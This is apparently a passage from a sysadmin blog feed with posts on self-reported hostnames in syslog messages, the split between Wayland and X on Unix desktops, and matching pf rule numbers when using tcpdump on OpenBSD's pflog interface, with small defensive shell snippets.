You might reasonably assume that the host name 'alkyone' comes from the central syslog daemon knowing the host name of the host that sent the syslog message to it. Unfortunately, this is not what actually happens. As covered in places like RFC 5424 section 6.2.4 (or RFC 3164 section 4.1.2 for the nominal 'BSD' syslog format, which seems to not actually be what BSD used), syslog messages carry an embedded hostname in them. This hostname is generated by the machine that originated the message, and the machine can put anything it wants to in there. And generally, your syslog daemon (and the log format it's using) will write this hostname into the logs and otherwise use it if you ask for the message's 'hostname'.

(Rsyslog and probably other syslog daemons can create per-host message files on your central syslog server, which can cause you to want a hostname for each message.)

The intent of this embedded hostname is noble; it's there so you can have syslog relays (which may happen accidentally), where the originating system sends its messages to host A and host A relays them to host B, and B records the hostname as the originating system, not host A. Unfortunately, in practice all sorts of things can go wrong, including a quite fun one.

The first thing that can go wrong is systems that have a different view of their hostname than you do. On Unix systems, the normal syslog hostname traditionally comes from whatever the general host name is set to, which isn't necessarily a fully qualified domain name and doesn't necessarily match what its IP address is (you can change the IP address of a system but forget to update its hostname). Some embedded systems will have an internally set host name instead of trying to deduce it from DNS lookups of whatever IP they have, which can cause them to use syslog hostnames like 'idrac-<asset-tag>' (for the BMC of a Dell server with that particular asset tag).

The most fun case is an interaction with a long-standing syslog feature (that I think is often disabled today):

<host> /bsd: arp: attempt to overwrite entry for [...]
last message repeated 2 times

You'll notice that the second message doesn't say '<host> last message repeated ...'. This is achieved with the extremely brute force method of setting the hostname in the message to 'last'. If your central syslog server then attempts to set up per-host syslog logs, you will wind up with a 'last' host (with extremely uninteresting logs).

Also, if people send not quite random garbage to your syslog server's listening network ports (perhaps because they are a vulnerability scanner or nmap or the like), your syslog daemon and your logs can wind up seeing all sorts of weird junk as the nominal hostname. The syslog message format is deliberately relatively liberal, and syslog servers have traditionally been even more liberal about interpreting whatever arrives on their ports, on the sensible grounds that it's usually better to record everything you get just in case.

Sidebar: Hostnames in syslog messages appear to be new-ish

In 4.2 BSD, the syslog daemon was part of the sendmail source code, and sendmail/aux/syslog.c doesn't get the hostname from the message but instead from the IP address it came from. I think this continues right through 4.4 BSD if I'm reading the code right. RFC 3164 dates from 2001, so presumably people augmented the syslog format some time before then.

Interestingly, RFC 3164 specifically says that the host name in the message must not include the domain name. I suspect that even at the time this was widely ignored in practice for good operational reasons.

The uncertain possible futures of Unix graphical desktops

By: cks

Once upon a time, the future of Unix desktops looked fairly straightforward. Everyone ran on X, so the major threat to cross-Unix portability of the major desktops was the use of Linux-only APIs, which increasingly meant D-Bus and systemd related things. Unix desktops that were less attached to tight integration with the Linux environment would probably stay easily available on FreeBSD, OpenBSD, and so on.

What happened to this nice simple vision was Wayland becoming the future of (Linux) graphics. Linux is the primary target of KDE and especially Gnome, so Wayland being the future on Linux has gotten Gnome's developers to start moving toward a Wayland-only vision. Wayland is unapologetically not cross-platform the way X was, which leaves other Unixes with a problem and creates a number of possible futures for Unix desktops.

In one future, other Unixes imitate Linux, implementing enough APIs to run Wayland and the other Linux things that in practice it depends on, and as a result they can probably continue to provide the big Linux-focused desktop environments like Gnome. I believe that FreeBSD is working on this approach, although I don't know if Gnome on Wayland on FreeBSD works yet. This allows the other Unix to mostly look like Linux, desktop-wise. As an additional benefit, it allows the other Unix to also use other, more minimal Wayland compositors (ie, window managers) that people may like, such as Sway (the one everyone mentions).

In another future, other Unixes don't attempt to chase Linux by implementing APIs to get Wayland and Gnome and so on to run, and instead stick with X. As desktops, major toolkits, and applications drop support for X or let it break through lack of use and lack of caring, these Unixes are likely to increasingly be left with old-fashioned X environments that are a lot more 'window manager' than they are 'desktop'. There are people, me included, who would be more or less happy with this state of affairs (in my case, as long as Firefox and a few other applications keep working). I suspect that this is the path that OpenBSD will stick with, and my guess is that anyone using OpenBSD for their desktop or laptop environment will be happy with this.

An unpleasant variant of this future comes about if Firefox and other applications are aggressive about dropping support for X. This would leave X-only Unixes as a backwater, stuck with (at best) old versions of important tools such as web browsers. There are some people who would still be happy with this, but probably not many.

Broadly, I think there is going to be a split between what you could call the Linux desktop (Wayland based with a major desktop environment such as Gnome, even if it's on FreeBSD instead of Linux), perhaps the Wayland desktop (Wayland based with a compositor like Sway instead of a full blown desktop environment), and an increasingly limited Unix desktop that over time will find itself having to move from being a desktop environment to being a window manager environment (as the desktop environments stop working well on X).

PS: One big question about the future of the Unix desktop is how many desktop environments will get good Wayland support and then abandon X. Right now, there are a fair number of desktop environments that have little or no Wayland support and a reasonable user base. The existence and popularity of these environments helps drive demand for continued X support in toolkits and so on. Of course, major Linux distributions may throw X-only desktops overboard someday, regardless of usage.

Seeing and matching pf rules when using tcpdump on OpenBSD's pflog interface

By: cks

Last year I wrote about some special tcpdump filtering options for OpenBSD's pflog interface, including the 'rnr <number>' option for matching and showing only packets blocked by a specific rule. You might want to do this if, for example, you temporarily throw brute force attacker IPs into a table and want to take them out soon after they stop hitting you.

Assuming that you're watching live, the way you do this is to find the rule number with 'pfctl -vv -s rules | grep @ | grep <term>' for a suitable term, such as the table name (or look through the whole thing with a pager), and then run 'tcpdump -n -i pflog0 "rnr <number>"'. However, looking up rule numbers is annoying, and a clever person might remember that the OpenBSD tcpdump can print the pf rule information for pflog packets through the '-e' option (for pflog, this is considered the link-level header). So you might think that the easy way to achieve what you want is 'tcpdump -n -e -i pflog0 | grep <term>', which is to say you're dumping all pflog packets and then picking out the ones that matched your rule.

Unfortunately, the pflog 'link-level header' doesn't actually tell you this. What it has is the rule number, whether the packet was blocked or not (you can log without blocking), which direction the block was (in or out), and what interface (plus that the packet was blocked because it matched a rule):

21:20:43.525222 rule 231/(match) block in on ix1: [...]

Quite sensibly, you don't get the actual contents of the rule that blocked the packet, so you can't grep for it and my clever idea was not so clever. If you read all the way to the Link Level Headers section of the OpenBSD tcpdump manual page, it explicitly tells you this:

On the packet filter logging interface pflog(4), logging reason (rule match, bad-offset, fragment, bad-timestamp, short, normalize, memory), action taken (pass/block), direction (in/out) and interface information are printed out for each packet.

So don't be like me and waste your time with the 'grep the tcpdump output' approach. It isn't going to work and you're going to have to do it the hard way.
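Since the hard way means looking up rule numbers by hand, you can at least script that part. Here's a rough sketch, where '<bruteforce>' stands in for whatever your actual table is called:

# find the number of the (first) rule that mentions our table,
# then watch only packets logged by that rule
rnr=$(pfctl -vv -s rules | awk '/^@/ && /<bruteforce>/ { sub(/^@/, "", $1); print $1; exit }')
tcpdump -n -e -i pflog0 "rnr $rnr"

Remember that rule numbers can change when you edit pf.conf and reload it, so you may have to re-run the lookup after a rules change.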

As far as I know there's no way to attach some sort of marker to rules in your pf.conf that will make them easy to pick out in pflog(4) packets. Based on the pflog(4) manual page, the packet format just doesn't have room for that. If you absolutely need to know this sort of thing for sure, even over rule changes, I think your only option is to log the packets to a non-default pflog(4) interface and then arrange for something to receive and store stuff from that interface.
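To illustrate that last approach, here's a sketch of what it might look like, again with '<bruteforce>' as a stand-in table name:

# create the extra pflog interface (or put 'up' in /etc/hostname.pflog1)
ifconfig pflog1 create

# in pf.conf, direct this rule's logging to pflog1 instead of pflog0
block in log (to pflog1) quick from <bruteforce> to any

Then anything that shows up on pflog1 came from that rule (or those rules) by construction, regardless of what rule numbers happen to be at the moment.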
